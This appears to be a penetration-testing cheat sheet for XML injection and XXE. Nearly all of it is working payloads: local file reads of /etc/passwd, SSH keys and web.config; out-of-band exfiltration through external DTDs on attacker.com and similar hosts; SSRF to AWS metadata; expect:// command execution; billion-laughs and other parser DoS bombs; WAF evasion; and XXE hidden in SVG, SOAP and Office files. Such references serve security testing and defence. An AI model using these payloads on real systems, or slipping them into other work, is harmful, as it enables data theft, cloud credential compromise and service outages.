XML Injection

XML (Extensible Markup Language) is a way to structure and transfer data between systems. It is similar to JSON, but older and more verbose. Web apps often use XML to communicate with databases, APIs, or other services Now, XML Injection happens when a web app doesn’t properly validate or sanitize XML input, letting attackers sneak in malicious XML data.

This can lead to data leaks, authentication bypasses, or even full system compromise. For example, suppose an app processes user-supplied XML without checks. In that case, an attacker can inject custom XML tags to manipulate queries, extract hidden data, or even trigger XXE (XML External Entity) attacks—which can expose internal files or allow server-side request forgery (SSRF).

  • XML Injection = Messing with XML data to break an app’s logic and security

Detecting XML External Entity (XXE) Vulnerability

An XML External Entity attack occurs when an XML parser processes external entities defined in a DTD (Document Type Definition). This allows attackers to read local files, perform SSRF (Server-Side Request Forgery), or execute remote code. Internal Entity Usage (Safe)

<!-- Internal entity declaration --> <!DOCTYPE safeExample [<!ENTITY example "Doe"> ]>
<userInfo> <firstName>John</firstName> <lastName>&example;</lastName> </userInfo>

External Entity Exploitation (Vulnerable to XXE)

<!DOCTYPE attack [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <userInfo>
<firstName>John</firstName> <lastName>&xxe;</lastName> </userInfo>

SSRF Attack via XXE

<!DOCTYPE attack [ <!ENTITY xxe SYSTEM "http://attacker.com/malicious"> ]> <userInfo>
<firstName>John</firstName> <lastName>&xxe;</lastName> </userInfo>

XXE Exploitation Techniques

Extracting sensitive files like /etc/passwd (Linux) or C:\boot.ini (Windows).

<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY test SYSTEM 'file:///etc/passwd'> ]>
<root>&test;</root>
<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM
"file:///c:/boot.ini"> ]> <foo>&xxe;</foo>

OOB XXE (Out-of-Band Exfiltration)

If direct file output is blocked, attackers can send it to an external server.

<!DOCTYPE foo [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]>

evil.dtd file on the attacker’s server

<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % all "<!ENTITY send SYSTEM
'http://attacker.com/log?%file;'>"> %all;

[Blind XXE(http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) (Triggering Requests Without Response) Used when responses are not reflected but requests are processed.

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://attacker.com/log"> ]> <root>&xxe;</root>

Using expect:// for Remote Code Execution (PHP-Specific)

If PHP’s expect:// wrapper is enabled, commands can be executed.

<!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "expect://id"> ]> <foo>&xxe;</foo>

Classic XXE - Reading Local Files

Used to read system files like /etc/passwd on Linux or C:\boot.ini on Windows. Linux:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Windows:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///c:/boot.ini">
]>
<foo>&xxe;</foo>

Base64 Encoding for Evasion

If the direct file output is blocked, encoding the response in Base64 helps bypass restrictions. Retrieves /etc/passwd in Base64, making detection harder.

<!DOCTYPE test [ <!ENTITY % init SYSTEM
"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]> <foo/>

PHP Wrapper - Extracting Source Code

The php://filter wrapper allows attackers to base64-encode and extract PHP source code. Extracts index.php and encodes it in Base64, useful for code analysis.

<!DOCTYPE replace [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
</contact>
</contacts>

SSRF via XXE

Extracts AWS instance metadata, leading to cloud infrastructure compromise.

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<foo>&xxe;</foo>

[OOB XXE](Out-of-Band Exploitation)

Impact: Data is sent to an external server (attacker.com), bypassing security controls.

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://attacker.com/log?data=file:///etc/passwd">
]>
<foo>&xxe;</foo>

Exploiting Public Identifiers

Requests an external payload, allowing remote file inclusion.

<!DOCTYPE foo PUBLIC "Random Text" "http://attacker.com/payload.xml">
<foo>&xxe;</foo>

XInclude Attacks

When you can't modify the DOCTYPE element, you can use XInclude to target local files or internal resources. XInclude allows XML documents to include content from external sources, making it a useful vector for exploiting XXE vulnerabilities.

<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text"
href="file:///etc/passwd"/> </foo>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text"
href="file:///C:/Windows/win.ini"/> </foo>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text"
href="http://malicious.com/payload.xml"/> </foo>

Exploiting XXE to Perform SSRF Attacks

XXE (XML External Entity) vulnerabilities can be combined with SSRF (Server-Side Request Forgery) to access internal services and extract sensitive information.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
]>
<foo>&xxe;</foo>
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://internal.service/admin">
%remote;
]>
<data>&remote;</data>
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % payload SYSTEM "http://attacker.com/evil.dtd">
67%payload;
]>
<test>&payload;</test>

Exploiting XXE to Perform a Denial of Service (DoS)

These attacks can crash services or entire servers. Do not use them in production environments.

Quadratic Blowup Attack

Unlike the Billion Laughs attack, this payload exploits XML parsers by repeating a large entity, causing extreme processing delays and memory consumption.

<!DOCTYPE data [
<!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
<!ENTITY y "&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;">
]>
<data>&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;</data>

YAML Recursive Reference Bomb

This YAML payload exploits cyclic references, causing infinite recursion when parsed, leading to excessive memory usage.

x: &x
y: *x
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]

Deeply Nested XML Bomb

This attack uses deep recursion instead of entity expansion, forcing the XML parser to exceed stack depth limits.

<data>
<item>
<item>
<item>
<item>
<item>
<item>
<item>
<item>
<item>
<item>Deep recursion attack!</item>
</item>
</item>
</item>
</item>
</item>
</item>
</item>
</item>
</item>
</data>

Billion Laugh Attack

<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

Parameters Laugh Attack

A variant of the Billion Laughs attack, this technique leverages delayed interpretation of parameter entities, causing excessive memory consumption and processing delays in XML parsers.

<!DOCTYPE r [
<!ENTITY % pe_1 "<!---->">
<!ENTITY % pe_2 "&#37;pe_1;<!---->&#37;pe_1;">
<!ENTITY % pe_3 "&#37;pe_2;<!---->&#37;pe_2;">
<!ENTITY % pe_4 "&#37;pe_3;<!---->&#37;pe_3;">
%pe_4;
]>
<r/>

Exploiting Error-Based XXE

Error-based XML External Entity (XXE) attacks rely on forcing the application to disclose error messages, which can leak sensitive file contents or system information.

Using Local DTD for Error-Based Exfiltration

If error-based exfiltration is possible, a local DTD file can be used for concatenation tricks, confirming if error messages expose file names.

<!DOCTYPE root [
<!ENTITY % local_dtd SYSTEM "file:///abcxyz/">
%local_dtd;
]>
<root></root>

Advanced Error-Based XXE: Reading File Contents via Error Messages

By referencing a non-existent entity inside a local DTD, attackers can trick the XML parser into leaking parts of a file through error messages.

<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY exfil SYSTEM 'file:///nonexistent/%file;'>">
%int;
]>
<root>&exfil;</root>

Error-Based XXE via OOB (Out-Of-Band) Exfiltration

If error messages do not disclose enough information, but DNS or HTTP requests are allowed, file contents can be exfiltrated using an external DTD.

<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://attacker.com/malicious.dtd">
%ext;
]>
<root></root>

List DTDs and generate XXE payloads using those local DTDs.

Linux Local DTD Exploitation

A list of existing DTD files in Linux can be found locate .dtd, fonts.dtd file contains an injectable entity %constant at line 148, making it a potential attack vector.

/usr/share/xml/fontconfig/fonts.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/usr/share/xml/svg/svg10.dtd
/usr/share/xml/svg/svg11.dtd
/usr/share/yelp/dtd/docbookx.dtd

Local File Disclosure (Linux)

This payload leverages fonts.dtd to exfiltrate the contents of /etc/passwd Reads sensitive files (/etc/passwd, .bash_history, .ssh/id_rsa). Stores file contents in /tmp/leak/, where it can be retrieved later.

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % constant 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM
&#x27;file:///tmp/leak/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<message>Text</message>

Windows Local DTD Exploitation

Common Windows local DTD files that can be abused

C:\Windows\System32\wbem\xml\cim20.dtd

Local File Disclosure (Windows)

Uses cim20.dtd to read sensitive files (web.config, php.ini).

<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM
&#x27;file://t/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
]>
<xxx>anything</xxx>

Triggering the XXE Vulnerability

XXE payload fetches a malicious remote DTD from attacker.com The SYSTEM keyword loads an external DTD. If the parser supports external entities, ext.dtd will be processed.

<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
%ext;
]>
<message></message>

Malicious DTD Content - Extracting /etc/passwd

1: Using an Error-Based Technique Defines an entity %file to read /etc/passwd. Defines %eval, which creates another entity (%error). Triggers an error by requesting a nonexistent file, appending /etc/passwd content. If the application includes error messages in HTTP responses, the file contents leak.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

2: Alternative Exfiltration via URL Encoding

%data; loads /etc/passwd.
%eval; builds a new entity %leak;.
%leak; references the leaked file content in the error message.
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM '%data;:///'>">
%eval;
%leak;

Blind XXE - Exfiltrating Data Out of Band (OOB)

When an application does not return XML parsing errors or output, Out-of-Band (OOB) XXE can be used to extract data.If the application is vulnerable, it will make a request to burpcollaborator.net, confirming XXE exploitation potential

Basic Blind XXE with Burp Collaborator

To detect blind XXE, try requesting an external resource (e.g., Burp Collaborator)

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM
"http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x">
%ext;
]>
<r></r>

Exfiltrating /etc/passwd via HTTP Request

%xxe reads /etc/passwd.
%callhome; sends the first line of /etc/passwd to www.malicious.com.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY callhome SYSTEM "http://www.malicious.com/?%xxe;">
]>
<foo>&callhome;</foo>

OOB XXE Attack (Yunusov, 2013)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>

Remote DTD File (parameterEntity_oob.dtd)

The external DTD loads file:///sys/power/image_size.

%send; sends its content to publicServer.com.
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;

XXE OOB with PHP Filters

Bypassing direct file access using PHP’s base64 encoding

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

Malicious DTD File (dtd.xml)

php://filter encodes /etc/passwd in base64.

%exfil; sends it to 127.0.0.1/dtd.xml.
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">

Apache Karaf CVE-2018-11788 XXE OOB Vulnerable Apache Karaf versions: ≤ 4.2.1 ≤ 4.1.6

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com">
%dtd;
]>
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0
http://karaf.apache.org/xmlns/features/v1.3.0">
<feature name="deployer" version="2.0" install="auto">
</feature>
</features>

WAF Bypasses and XXE Exploitation Techniques

XML parsers use four methods to detect encoding:

  1. HTTP Content-Type
Content-Type: text/xml; charset=utf-8
  1. Reading Byte Order Mark (BOM)
UTF-8: 3C 3F 78 6D
UTF-16BE: 00 3C 00 3F
UTF-16LE: 3C 00 3F 001
  1. XML Declaration:
<?xml version="1.0" encoding="UTF-8"?>

XXE Exploitation Techniques

application/json- {"search":"name","value":"test"}
application/xml- <?xml version="1.0" encoding="UTF-8" ?><root><search>name</search><value>data</value></root>
{ "errors":{ "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity." } }

XXE Inside Exotic Files

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
width="300" version="1.1" height="200"> <image xlink:href="expect://ls" width="200"
height="200"></image> </svg>

Classic Exploit

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Out-of-Band (OOB) XXE via SVG Rasterization

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
%sp;
%param1;
]>
<svg viewBox="0 0 200 200" version="1.2" xmlns="http://www.w3.org/2000/svg" style="fill:red">
<text x="15" y="100" style="fill:black">XXE via SVG rasterization</text>
</svg>

XXE Inside SOAP

<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>

XXE Inside Office Files

Inject XXE payload into .xml files within a .docx:

/word/document.xml
/ppt/presentation.xml
/xl/workbook.xml
/_rels/.rels
[Content_Types].xml
Update the ZIP file
zip -u xxe.docx [Content_Types].xml

Tool XXE in XLSX

7z x -oXXE xxe.xlsx
cd XXE
zip -u ../xxe.xlsx *

Inject Payload in xl/workbook.xml

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM
"http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>
Or inject in xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM
"http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10"
uniqueCount="10">
<si><t>&rrr;</t></si>
</sst>

Write-ups

Cheatsheet

Labs

Reference